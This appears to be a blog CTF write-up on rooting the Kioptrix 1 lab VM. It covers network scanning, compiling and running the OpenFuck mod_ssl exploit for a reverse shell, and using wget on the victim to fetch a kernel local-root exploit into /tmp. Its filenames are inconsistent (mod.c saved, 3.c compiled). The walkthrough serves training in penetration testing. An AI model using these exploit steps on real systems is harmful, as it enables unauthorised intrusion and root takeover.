Kioptrix 1 is a beginners level CTF challenge. It can be downloaded from vulnhub . The objective of this challenge is to get root access on the machine. In this write-up, I will show how I achieved this objective.

Note: In order to keep all my CTF’s write-ups crisp and concise, I only mentioned the steps which led me to the positive results. During the course of solving the CTFs there are lot of trials and errors, hours or in some case even days of failed attempts and falling into rabbit holes before reaching to the correct solution. I strongly recommend to try the challenges on your own before moving on to see the solutions. This will help you to learn a lot of extra new things and it will give you immense sense of satisfaction.

My lab setup consists of Kali linux (will be referred as attacker) running in VMware Player and the network adapter is set to NAT. Network settings of downloaded VM (will be referred as victim) is changed (if not already) to NAT to bring attacker and victim machine to the same network and isolate them with the guest OS. I approach every challenge with the typical penetration testing methodology of Reconnaissance, Exploitation and Post Exploitation.

Reconnaissance

After booting up the VM, the first task is to find its IP address. My Kali box and Kioptrix VM are on the same network (as the network is set to NAT). I started with checking my Kali IP address using ifconfig. IP address of my Kali machine is 192.168.57.137 . I scanned the whole network to look for the live hosts using netdiscover

netdiscover -r 192.168.57.0/24 1 netdiscover - r 192.168.57.0 / 24



The IP address of victim is 192.168.57.136.

Now it is the time for port scanning. I used nmap to perform SYN scan (-sS) of all 65535 ports (-p-), detect the version (-A) of the running services and OS (-O). The result is displayed in verbose mode (-v).

nmap -sS -p- -v -A -O 192.168.57.136 1 nmap - sS - p - - v - A - O 192.168.57.136

Scan result showed that the victim is running web server with port 80 and 443.

Exploitation

We can see the web server is running apache with mod_ssl/2.8.4. mod_ssl is the module which provides strong cryptography for Apache Web servers by encrypting the traffic using SSL/TLS. The package version mod_ssl/2.8.4 – mod_ssl 2.8.7 is infamous for vulnerabilities. A quick google search of mod_ssl/2.8.4 shows that it is vulnerable to buffer overflow attacks which can allow attacker to execute arbitrary commands. We will be exploiting this vulnerability to get the shell on the victim box.

The exploit present for this vulnerability on exploit-db is quite old and requires some modification to make it work. The updated exploit can be obtained from my github repository. Clone/download the repository and copy the file “openfuck.c“. “openfuck.c” exploits the buffer overflow vulnerability in mod_ssl/2.8.4 package and gives us the reverse shell. Successful compilation requires libssl-dev library. Download it if not present using apt-get install libssl-dev

Compile the code

gcc -o openfuck openfuck.c -lcrypto 1 gcc - o openfuck openfuck .c - lcrypto

Run the exploit by providing victims IP (here 192.168.57.136 ) and port (443). After few trial and errors, I came up with correct parameters

./openfuck 0x6b 192.168.57.136 443 -c 45 1 . / openfuck 0x6b 192.168.57.136 443 - c 45

Now we have shell on victim 🙂







Post Exploitation

Lets do some information gathering on the victim.



The shell which we got is for ‘apache‘ user which is having limited privileges. Our objective is to obtain ‘root’. From here we need to escalate the privilege.

Check of the kernel version using ‘uname -a‘

Linux Kernel 2.4.7 is vulnerable to local root exploit. This will allow us to escalate our privilege to root. We will download the exploit to the ‘tmp‘ directory on the victim.

wget -O /tmp/mod.c https://www.exploit-db.com/download/3/ 1 wget - O / tmp / mod .c https : / / www .exploit - db .com / download / 3 /

Compile the exploit and run it

gcc -o /tmp/3 /tmp/3.c /tmp/3 1 2 gcc - o / tmp / 3 / tmp / 3.c / tmp / 3

And we are done !!!! Now we have root access on the victim 😀

I hope this write-up was helpful. Share this if you found it useful. If you have any questions please leave you comments. Subscribe to the mailing list to get updates for my future CTF write-ups and blogs.

Happy Learning 🙂